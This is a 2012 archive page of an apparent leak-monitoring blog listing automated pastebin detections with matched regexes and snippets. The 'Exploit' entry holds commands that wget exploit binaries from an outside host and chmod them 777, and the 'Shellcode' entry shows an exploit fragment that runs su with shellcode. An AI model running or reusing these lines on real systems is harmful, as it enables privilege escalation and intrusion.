LeakedIn Logo
Stories About Data Leaks and Related Stuff

Archive for April 17th, 2012

Potential leak of data: MD5/SHA1 Hash

0 votedvote

Detected 24 occurrence(s) of ‘[ \t:=”‘]+[0-9a-f]{32}(?:[0-9a-f]{8})?’:

[17:29:46] [SEVERE]	[Info] Downloading 'minecraft.yml' from 'http://mirror.technicpack.net/Technic/minecraft.yml'.
[17:29:48] [SEVERE]	[MD5 Mismatch] File '\launcher\technicssp\modpack.yml' has md5 of 'f00f397dc8d35bf9f745321149a64245' instead of 'a4201ad8ff8d6765a80b0b68a9e1eb3e'
[17:29:48] [SEVERE]	[Info] Downloading 'modpack.yml' from 'http://mirror.technicpack.net/Technic/technicssp/modpack.yml'.
[17:30:11] [SEVERE]	Starting download of 'http://s3.amazonaws.com/MinecraftDownload/windows_natives.jar.lzma', with 3 trie(s) rema

Source: pastebin.com/raw.php?i=Xh4T8reT

Potential leak of data: Exploit

0 votedvote

Detected 3 occurrence(s) of ‘exploit’:

system("wget http://atelier3.jp/js/js/bsd-ktimer");
system("chmod 777 bsd-ktimer");
system("wget http://atelier3.jp/js/js/exploit");
system("chmod 777 exploit");
system("wget http://atelier3.jp/js/js/freedbs5.3");
system("chmod 777 freedbs5.3");
system("wget http://atelier3.jp/js/js/mountnfsex");
system("chmod 777 mountnfsex");

Source: pastebin.com/raw.php?i=mPJkxWef

Potential leak of data: Secret Variable

0 votedvote

Detected 2 occurrence(s) of ‘secret\s*[\=]+’:

                $user = null;
        echo $user_profile[name];
        echo $user_profile[id];
        echo $user_profile[picture];
include ('src/facebook.php');    
$app_id = "160336957418730";
$app_secret = "************************";
$facebook = new Facebook( array('appId' => $app_id, 'secret' => $app_secret, ));
$user = $facebook->getUser();
if ($user) {
  try {
    // Proceed knowing you have a logged in user who's authenticated.
    $user_profile = $face

Source: pastebin.com/raw.php?i=h8n9tc2C

Potential leak of data: Shellcode

0 votedvote

Detected 6 occurrence(s) of ‘shellcode’:

#error "That platform is not supported."
		printf("[+] Executing su with shellcode.\n");
		execl("/bin/su", "su", shellcode, NULL);
	} else {
		char sock[32];
		sprintf(sock, "%d", sockets[0]);
		printf("[+] Executing child from child fork.\n");
		execl("/proc/self/exe", prog_name, "-c", sock, NULL);
	return 0;

int main(int argc, char **argv)
	prog_name = a

Source: pastebin.com/raw.php?i=JZ3Dph9F

Potential leak of data: MD5/SHA1 Hash

0 votedvote

Detected 1 occurrence(s) of ‘[ \t:=”‘]+[0-9a-f]{32}(?:[0-9a-f]{8})?’:

e, the possible CA certificates in the server certificate chain
#	are ignored and only the server certificate is verified. This is
#	configured with the following format:
#	hash:://server/sha256/cert_hash_in_hex
#	For example: "hash://server/sha256/
#	5a1bc1296205e6fdbe3979728efe3920798885c1c4590b5f90f43222d239ca6a"
#	On Windows, trusted CA certificates can be loaded from the system
#	certificate store by setting this to cert_store://<name>, e.g.,
#	ca_cert="cert_store://CA" or ca_cert="cert_store://ROOT".
#	Note that when running wpa_

Source: pastebin.com/raw.php?i=PNHz7enW

You are currently browsing the LeakedIn blog archives for the day Tuesday, April 17th, 2012.